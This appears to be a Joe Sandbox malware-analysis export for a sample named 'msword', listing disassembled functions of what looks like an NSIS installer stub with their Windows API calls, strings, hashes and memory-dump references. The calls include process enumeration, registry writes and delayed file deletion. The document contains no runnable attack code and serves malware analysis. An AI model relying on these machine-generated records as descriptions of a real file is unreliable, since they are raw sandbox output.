String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
API String ID: 2035342205-1650287579
Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE

Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F0), ref: 00404525
IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
GetDlgItem.USER32(?,000003FB), ref: 00404553
GetAsyncKeyState.USER32(00000010), ref: 0040455A
GetDlgItem.USER32(?,000003F0), ref: 0040456F
ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
SetWindowTextW.USER32(?,?), ref: 004045AF
SHBrowseForFolderW.SHELL32(?), ref: 00404669
lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
CoTaskMemFree.OLE32(00000000), ref: 00404674

Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3

Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB

GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004283D1,76F923A0,00000000), ref: 00406902

SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819

Strings

F, xrefs: 004046A0
A, xrefs: 00404662

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
String ID: F$A
API String ID: 3347642858-1281894373
Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59

Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
lstrcmpA.KERNEL32(name,?), ref: 00406FF3
CloseHandle.KERNEL32(?), ref: 00407212

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

%s: failed opening file "%s", xrefs: 00406F38
name, xrefs: 00406FEB
GetTTFNameString, xrefs: 00406F33

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
String ID: %s: failed opening file "%s"$GetTTFNameString$name
API String ID: 1916479912-1189179171
Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75

Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004283D1,76F923A0,00000000), ref: 00406902
GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,004283D1,76F923A0,00000000), ref: 00406A73

Strings

F, xrefs: 00406858
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406A0B
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406952
F, xrefs: 00406A7F

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3581403547-1792361021
Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59

Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E

Strings

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: CreateInstance
String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
API String ID: 542301482-1377821865
Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54

Function 004079A2 Relevance: .3, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95

Function 0040737E Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85

Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
lstrlenW.KERNEL32(?), ref: 004063F8
GetVersionExW.KERNEL32(?), ref: 00406456

Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D

LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
FreeLibrary.KERNEL32(00000000), ref: 00406500
GlobalFree.KERNEL32(?), ref: 00406509

Strings

GetModuleBaseNameW, xrefs: 004064C0
EnumProcesses, xrefs: 004064AE
Kernel32.DLL, xrefs: 004065C7
PSAPI.DLL, xrefs: 00406490
Module32FirstW, xrefs: 004065FF
Process32NextW, xrefs: 004065F4
Process32FirstW, xrefs: 004065E9
CreateToolhelp32Snapshot, xrefs: 004065E1
EnumProcessModules, xrefs: 004064B6
Module32NextW, xrefs: 0040660A
Unknown, xrefs: 00406528

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59

Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
GetDlgItem.USER32(?,000003E8), ref: 004041AD
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
GetSysColor.USER32(?), ref: 004041DB
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
lstrlenW.KERNEL32(?), ref: 00404202
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E

Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030

GetDlgItem.USER32(?,0000040A), ref: 00404276
SendMessageW.USER32(00000000), ref: 0040427D
GetDlgItem.USER32(?,000003E8), ref: 004042AA
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
SetCursor.USER32(00000000), ref: 004042FE
ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
SetCursor.USER32(00000000), ref: 00404322
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363

Strings

N, xrefs: 00404298
F, xrefs: 004042D3
open, xrefs: 0040430B

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: F$N$open
API String ID: 3928313111-1104729357
Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99

Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD

Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24

GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
wsprintfA.USER32 ref: 00406B79
GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63

Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
GlobalFree.KERNEL32(00000000), ref: 00406C7E
CloseHandle.KERNEL32(?), ref: 00406C88

Strings

^F, xrefs: 00406ACF
plF, xrefs: 00406B54
%s=%s, xrefs: 00406B6F
NUL, xrefs: 00406ACA
[Rename], xrefs: 00406BF4, 00406C03

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMulusermePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: ^F$%s=%s$NUL$[Rename]$plF
API String ID: 565278875-3368763019
Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32(00000000,?,00000000), ref: 004010ED
DeleteObject.GDI32(?), ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32(?), ref: 0040116E
EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4

Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
RegCloseKey.ADVAPI32(?), ref: 004029E4

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
WriteReg: error creating key "%s\%s", xrefs: 004029F5
WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: lstrlen$CloseCreateValuewvsprintf
